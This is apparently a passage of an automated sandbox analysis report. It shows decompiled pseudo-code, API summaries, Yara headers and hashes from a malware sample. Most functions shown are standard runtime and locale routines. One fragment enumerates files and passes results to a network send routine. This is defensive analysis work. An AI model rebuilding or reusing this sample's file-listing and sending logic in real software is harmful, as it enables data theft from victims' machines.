						_t34 = E004020A5(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						E00401FA1( &_v28,  &_v28, _t73, E004058E6(_t50,  &_v52,  &_v28, __eflags, _t34));
						E00401F97();
						goto L5;
					}
					E004020E6(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					E00401790(_t50, 0x4610f8, _t71, __eflags);
					E00401F97();
				} else {
					E004111F2(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					E00401790(_t49, 0x4610f8,  &_a4, _t77);
				}
				return E004031D1();
			}














                                            0x00404207
                                            0x00404209
                                            0x0040420c
                                            0x0040422f
                                            0x0040423e
                                            0x00404243
                                            0x0040424a
                                            0x00404252
                                            0x00404254
                                            0x00404259
                                            0x0040425b
                                            0x00404275
                                            0x004042b4
                                            0x004042b4
                                            0x004042b4
                                            0x004042c7
                                            0x004042c9
                                            0x0040428e
                                            0x00404294
                                            0x004042a4
                                            0x004042ac
                                            0x00000000
                                            0x004042b1
                                            0x004042d4
                                            0x004042d9
                                            0x004042e0
                                            0x004042e8
                                            0x0040420e
                                            0x00404216
                                            0x0040421b
                                            0x00404222
                                            0x00404222
                                            0x004042fa

                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00404201
                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 004042C1
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$FirstNextsend
                                            • String ID:
                                            • API String ID: 4113138495-0
                                            • Opcode ID: ed7b6a185b824ebfd57d1b04e2dd908c058daf29c135c5452ec28a282d673626
                                            • Instruction ID: 0bc9deb902719b57f786a7752c823a2981b8ce3e49d0149cec332099c3bbd115
                                            • Opcode Fuzzy Hash: ed7b6a185b824ebfd57d1b04e2dd908c058daf29c135c5452ec28a282d673626
                                            • Instruction Fuzzy Hash: 262193719101196ACB04FB61CC9ADEEB738AF51308F40417FFA06771E1EF385A898A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00441327, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00441327(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0044195A(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E004418C0(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                            0x00441335
                                            0x0044133c
                                            0x00441341
                                            0x00441347
                                            0x0044134a
                                            0x00441350
                                            0x00441355
                                            0x0044135a
                                            0x0044135a
                                            0x00441360
                                            0x00441365
                                            0x0044136a
                                            0x0044136a
                                            0x00441371
                                            0x00441376
                                            0x0044137b
                                            0x0044137b
                                            0x00441382
                                            0x00441387
                                            0x0044138c
                                            0x0044138c
                                            0x00441393
                                            0x00441398
                                            0x0044139d
                                            0x0044139d
                                            0x004413a5
                                            0x004413b5
                                            0x004413c7
                                            0x004413d9
                                            0x004413ec
                                            0x004413fe
                                            0x00441406
                                            0x0044140b
                                            0x00441410
                                            0x00441410
                                            0x00441417
                                            0x0044141c
                                            0x0044141c
                                            0x00441423
                                            0x00441428
                                            0x00441428
                                            0x0044142f
                                            0x00441434
                                            0x00441434
                                            0x0044143b
                                            0x00441440
                                            0x00441440
                                            0x0044144a
                                            0x0044144c
                                            0x00441486
                                            0x0044144e
                                            0x00441453
                                            0x00441477
                                            0x0044147f
                                            0x00441473
                                            0x00441473
                                            0x00441489
                                            0x00441490
                                            0x00441492
                                            0x004414b4
                                            0x004414bc
                                            0x004414bf
                                            0x004414bf
                                            0x004414c1
                                            0x004414c1
                                            0x004414cc
                                            0x004414d2
                                            0x004414d7
                                            0x004414de
                                            0x00441518
                                            0x00441523
                                            0x00441529
                                            0x0044152c
                                            0x0044152f
                                            0x0044153b
                                            0x00441543
                                            0x004414e0
                                            0x004414e3
                                            0x004414ef
                                            0x004414f5
                                            0x004414fb
                                            0x004414fe
                                            0x00441507
                                            0x00441507
                                            0x00441546
                                            0x00441554
                                            0x0044155a
                                            0x00441561
                                            0x00441563
                                            0x00441563
                                            0x0044156a
                                            0x0044156c
                                            0x0044156c
                                            0x00441573
                                            0x00441575
                                            0x00441575
                                            0x0044157c
                                            0x0044157e
                                            0x0044157e
                                            0x00441585
                                            0x00441587
                                            0x00441587
                                            0x00441594
                                            0x00441597
                                            0x004415ce
                                            0x00441599
                                            0x00441599
                                            0x0044159c
                                            0x004415c7
                                            0x004415bc
                                            0x004415bc
                                            0x004415d0
                                            0x004415d8
                                            0x004415db
                                            0x004415fa
                                            0x004415ff
                                            0x004415ff
                                            0x00441601
                                            0x00441606
                                            0x00441612
                                            0x00441608
                                            0x0044160b
                                            0x0044160b
                                            0x00441617
                                            0x00441617
                                            0x004415dd
                                            0x004415e0
                                            0x004415ef
                                            0x00000000
                                            0x004415ef
                                            0x004415e2
                                            0x004415e5
                                            0x004415e7
                                            0x004415e7
                                            0x00000000
                                            0x004415e5
                                            0x0044159e
                                            0x004415a1
                                            0x004415b7
                                            0x00000000
                                            0x004415b7
                                            0x004415a6
                                            0x004415a8
                                            0x004415a8
                                            0x004415a6
                                            0x00000000
                                            0x00441597
                                            0x00441499
                                            0x004414a7
                                            0x004414af
                                            0x00000000
                                            0x004414af
                                            0x0044149d
                                            0x004414a2
                                            0x004414a2
                                            0x00000000
                                            0x0044149d
                                            0x0044145a
                                            0x00441468
                                            0x00441470
                                            0x00000000
                                            0x00441470
                                            0x0044145e
                                            0x00441463
                                            0x00441463
                                            0x0044145e

                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00441322,?,?,00000008,?,?,0044622D,00000000), ref: 00441554
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: ed7db753394f845f2476f30fca76a6d950ee787d4f9e3977a89970841f006a8e
                                            • Instruction ID: c99b447307f7ba8f7c60536c718b1ca1012e3ad9ce013cbf8699bab62c6643d6
                                            • Opcode Fuzzy Hash: ed7db753394f845f2476f30fca76a6d950ee787d4f9e3977a89970841f006a8e
                                            • Instruction Fuzzy Hash: 4FB15C31610608DFE715CF28C48ABA57BE0FF45365F298659E89ACF2B1C339D992CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FD83, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E0043FD83(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x45f014; // 0x8d941b67
				_v8 = _t16 ^ _t54;
				_t35 = E00438D61(__ebx, __ecx, __edx);
				_t50 =  *(E00438D61(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0043FE5B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E00442CC1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E00442CC1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E0043FFB3(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E004294CB(_v8 ^ _t54);
			}














                                            0x0043fd8e
                                            0x0043fd95
                                            0x0043fda3
                                            0x0043fdab
                                            0x0043fdba
                                            0x0043fdc6
                                            0x0043fdd7
                                            0x0043fddf
                                            0x0043fdf0
                                            0x0043fdf9
                                            0x0043fe09
                                            0x0043fe1b
                                            0x0043fe24
                                            0x0043fe26
                                            0x0043fe27
                                            0x00000000
                                            0x0043fe27
                                            0x0043fe24
                                            0x0043fdfb
                                            0x0043fdfe
                                            0x0043fe35
                                            0x0043fe35
                                            0x0043fe38
                                            0x0043fe3b
                                            0x0043fe00
                                            0x0043fe00
                                            0x0043fe01
                                            0x0043fe28
                                            0x0043fe28
                                            0x0043fe33
                                            0x00000000
                                            0x00000000
                                            0x0043fe33
                                            0x0043fdfe
                                            0x0043fde1
                                            0x0043fde1
                                            0x0043fde3
                                            0x0043fe58

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438DC0
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DCD
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043FDD7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                            • String ID:
                                            • API String ID: 1663032902-0
                                            • Opcode ID: 3109aaeb53ebcb9363b45cc2dae20d2fc100261cdd7e7ee050f604ba242fc62a
                                            • Instruction ID: cda7e59f0c7129586006f16be9a9983b6125e742542fcd695f4b3087cabff7f2
                                            • Opcode Fuzzy Hash: 3109aaeb53ebcb9363b45cc2dae20d2fc100261cdd7e7ee050f604ba242fc62a
                                            • Instruction Fuzzy Hash: 1721C132900206ABEB249E25DD46BBB73A8EB08314F10107FFD05C6252EB7C9D49DB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FA0B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E0043FA0B(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00438D61(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E0043FB07( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E0043FB33, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}



















                                            0x0043fa18
                                            0x0043fa1e
                                            0x0043fa1f
                                            0x0043fa22
                                            0x0043fa25
                                            0x0043fa25
                                            0x0043fa28
                                            0x0043fa2a
                                            0x0043fa38
                                            0x0043fa3e
                                            0x0043fa41
                                            0x0043fa44
                                            0x0043fa44
                                            0x0043fa47
                                            0x0043fa49
                                            0x0043fa52
                                            0x0043fa5d
                                            0x0043fa60
                                            0x0043fa66
                                            0x0043fa71
                                            0x0043fa71
                                            0x0043fa7a
                                            0x0043fa7d
                                            0x0043fa85
                                            0x0043fa8b
                                            0x0043fa8f
                                            0x0043fa94
                                            0x0043fa98
                                            0x0043fa9d
                                            0x0043fa9f
                                            0x00000000
                                            0x0043fa9f
                                            0x0043faa5

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • EnumSystemLocalesW.KERNEL32(0043FB33,00000001,00000000,?,00435A94,?,00440160,00000000,?,?,?), ref: 0043FA7D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID:
                                            • API String ID: 1084509184-0
                                            • Opcode ID: 0367c39519fe42e30fa342d4c6c5e6d1eb31e8d708e613d5a50902309657ef5d
                                            • Instruction ID: 9832b6fc2e4d8f99cb9265d4e9744a21d5488568a689d4f27fe084702ccad945
                                            • Opcode Fuzzy Hash: 0367c39519fe42e30fa342d4c6c5e6d1eb31e8d708e613d5a50902309657ef5d
                                            • Instruction Fuzzy Hash: B011293A6007055FDB18AF39D8916BBB791FF84328F18443EE94647B40D7757946C744
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FFB3, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0043FFB3(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00438D61(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E0043FB07( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}















                                            0x0043ffb8
                                            0x0043ffbb
                                            0x0043ffc0
                                            0x0043ffc3
                                            0x0043ffe7
                                            0x0043fff0
                                            0x0044001a
                                            0x0044001c
                                            0x0043fff8
                                            0x0043fff8
                                            0x0043fffb
                                            0x0043fffe
                                            0x0043fffe
                                            0x00440001
                                            0x00440004
                                            0x00440018
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440018
                                            0x0043ffe9
                                            0x0043ffe9
                                            0x0043ffe9
                                            0x0043ffe9
                                            0x00440022

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043FD51,00000000,00000000,?), ref: 0043FFDF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$InfoLocale_abort_free
                                            • String ID:
                                            • API String ID: 2692324296-0
                                            • Opcode ID: 50fa8545c583c899af152cae67081bd78ab1a1a737adb0cb6b46ee9199003bc1
                                            • Instruction ID: 8c5b2dd8668d59b45d2c696d39fe06416bb583570bce157773f5a1cb5da70698
                                            • Opcode Fuzzy Hash: 50fa8545c583c899af152cae67081bd78ab1a1a737adb0cb6b46ee9199003bc1
                                            • Instruction Fuzzy Hash: 15F0F932A0011ABBEB285F25D805BBBB758EB45718F14447BED05A3240EA7DBD15C6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FAA6, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043FAA6(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00438D61(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E0043FB07( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E0043FD83, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}













                                            0x0043fab3
                                            0x0043fab9
                                            0x0043faba
                                            0x0043fabd
                                            0x0043fac0
                                            0x0043fac0
                                            0x0043fac3
                                            0x0043fac5
                                            0x0043fad3
                                            0x0043fad6
                                            0x0043fadb
                                            0x0043fae6
                                            0x0043fae6
                                            0x0043faef
                                            0x0043faf2
                                            0x0043faf8
                                            0x0043fafe
                                            0x0043fb00
                                            0x00000000
                                            0x0043fb00
                                            0x0043fb06

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • EnumSystemLocalesW.KERNEL32(0043FD83,00000001,?,?,00435A94,?,00440124,00435A94,?,?,?,?,?,00435A94,?,?), ref: 0043FAF2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID:
                                            • API String ID: 1084509184-0
                                            • Opcode ID: cf538bdc177614faffcfe1ea89c08be526db979e38ba06d754314114cb0e92b0
                                            • Instruction ID: f7f4e156ebdcebfca202e3cd98d40d9122c1f3fc02fa4add1dc439a73c22909e
                                            • Opcode Fuzzy Hash: cf538bdc177614faffcfe1ea89c08be526db979e38ba06d754314114cb0e92b0
                                            • Instruction Fuzzy Hash: 99F02276A003051FDB24AF39C881A6BBB95EF8836CF14403EF94A8B680D7B5AC01C648
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00437C22, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00437C22(void* __eflags) {
				int _t15;
				void* _t28;

				E00429310(0x45d6a8, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E00436684( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x460718 = E00437CCE( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00437BDC, 1);
				_push(0x20);
				asm("ror eax, cl");
